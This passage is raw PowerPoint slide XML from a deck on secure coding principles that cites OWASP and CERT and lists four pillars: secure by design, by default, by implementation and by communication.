                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Principles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70059" lvl="1" indent="-215200" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFC000"/>
              </a:buClr>
              <a:buSzPct val="109090"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="570694" algn="l"/>
              </a:tabLst>
            </a:pP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Common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Coding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Principles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70059" lvl="1" indent="-215200" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFC000"/>
              </a:buClr>
              <a:buSzPct val="109090"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="570694" algn="l"/>
              </a:tabLst>
            </a:pP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Summary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60372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171405" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="1350"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-5" dirty="0"/>
              <a:t>Understanding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-10" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2799"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916700" y="1332267"/>
            <a:ext cx="10206871" cy="2969122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5078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common secure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coding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principles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been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known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for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more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than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decade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50785" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="81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They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have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changed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over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time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as the understanding of application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security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has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improved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46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list is based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variety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sources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OW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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ASP(http://o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wasp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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>.org/index.php/Secure_Coding_Principles)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CE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" u="sng" spc="-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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" u="sng" spc="-2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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>tp://secu</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" u="sng" spc="-2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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" u="sng" spc="-1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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" u="sng" spc="-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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" u="sng" spc="-1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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" u="sng" spc="-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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" u="sng" spc="-1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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" u="sng" spc="-1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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>rt</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" u="sng" spc="-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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" u="sng" spc="-2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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" u="sng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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>g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)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ersona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x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perie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88578" y="6450406"/>
            <a:ext cx="83798" cy="151284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900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr sz="900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77028" y="3797712"/>
            <a:ext cx="3600274" cy="203553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956383" y="6375445"/>
            <a:ext cx="3070695" cy="166028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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://blogs.fsfe.org/mk/files/2014/02/xkcd-standards.png</a:t>
            </a:r>
            <a:endParaRPr sz="100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60372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171405" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="1350"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-5" dirty="0"/>
              <a:t>Understanding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-10" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2799"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6859260" y="2552928"/>
            <a:ext cx="4448286" cy="3570310"/>
            <a:chOff x="6861047" y="2552700"/>
            <a:chExt cx="4449445" cy="35712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1047" y="2552700"/>
              <a:ext cx="4449301" cy="35709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560563" y="3480816"/>
              <a:ext cx="277495" cy="1252855"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="277495" h="1252854">
                  <a:moveTo>
                    <a:pt x="277368" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1252728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277368" y="125272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621823" y="3748432"/>
            <a:ext cx="156068" cy="90717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696" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1240"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>De</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>si</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr sz="12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524560" y="3492992"/>
            <a:ext cx="276153" cy="1260147"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="276225" h="1260475">
                <a:moveTo>
                  <a:pt x="275844" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1260347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275844" y="1260347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2758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914126"/>
            <a:endParaRPr sz="179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87154" y="3728340"/>
            <a:ext cx="156068" cy="94653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696" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1240"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ult</a:t>
            </a:r>
            <a:endParaRPr sz="12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411295" y="3168463"/>
            <a:ext cx="277423" cy="1877206"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="277495" h="1877695">
                <a:moveTo>
                  <a:pt x="277368" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1877567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277368" y="1877567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2773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914126"/>
            <a:endParaRPr sz="179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74525" y="3464443"/>
            <a:ext cx="156068" cy="150328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696" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1240"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pl</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>eme</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nt</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:endParaRPr sz="12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392497" y="3128850"/>
            <a:ext cx="277423" cy="1987032"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="277495" h="1987550">
                <a:moveTo>
                  <a:pt x="277368" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1987295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277368" y="1987295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2773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914126"/>
            <a:endParaRPr sz="179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55980" y="3487604"/>
            <a:ext cx="156068" cy="155153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696" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1240"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-5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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Communications</a:t>
            </a:r>
            <a:endParaRPr sz="12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63184" y="6479049"/>
            <a:ext cx="147282" cy="1282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sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:pPr marL="38089" defTabSz="914126">
                <a:lnSpc>
                  <a:spcPts val="955"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr sz="9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6700" y="1267123"/>
            <a:ext cx="8367120" cy="3013560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may remember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Four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Pillars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Software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These are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the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goals of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Engineering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Create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application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defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="3099">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="803034" lvl="1" indent="-286934" defTabSz="914126">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="803034" algn="l"/>
                <a:tab pos="803669" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F3863"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-2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srgbClr val="1F3863"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-4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srgbClr val="1F3863"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Design</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="803034" lvl="1" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="803034" algn="l"/>
                <a:tab pos="803669" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F3863"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-2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srgbClr val="1F3863"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-3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999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F3863"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Default</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="803034" lvl="1" indent="-286934" defTabSz="914126">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="803034" algn="l"/>
                <a:tab pos="803669" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F3863"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-2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srgbClr val="1F3863"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-3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999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F3863"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Implementation</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="803034" lvl="1" indent="-286934" defTabSz="914126">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="803034" algn="l"/>
                <a:tab pos="803669" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F3863"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-4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srgbClr val="1F3863"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-5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srgbClr val="1F3863"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Communication</a:t>
            </a:r>
            <a:endParaRPr sz="1999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163184" y="6479049"/>
            <a:ext cx="147282" cy="1282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9" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="955"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:pPr marL="38089" defTabSz="914126">
                <a:lnSpc>
                  <a:spcPts val="955"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr sz="9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60372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171405" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="1350"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-5" dirty="0"/>
              <a:t>Understanding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2799" b="0" spc="-10" dirty="0"/>
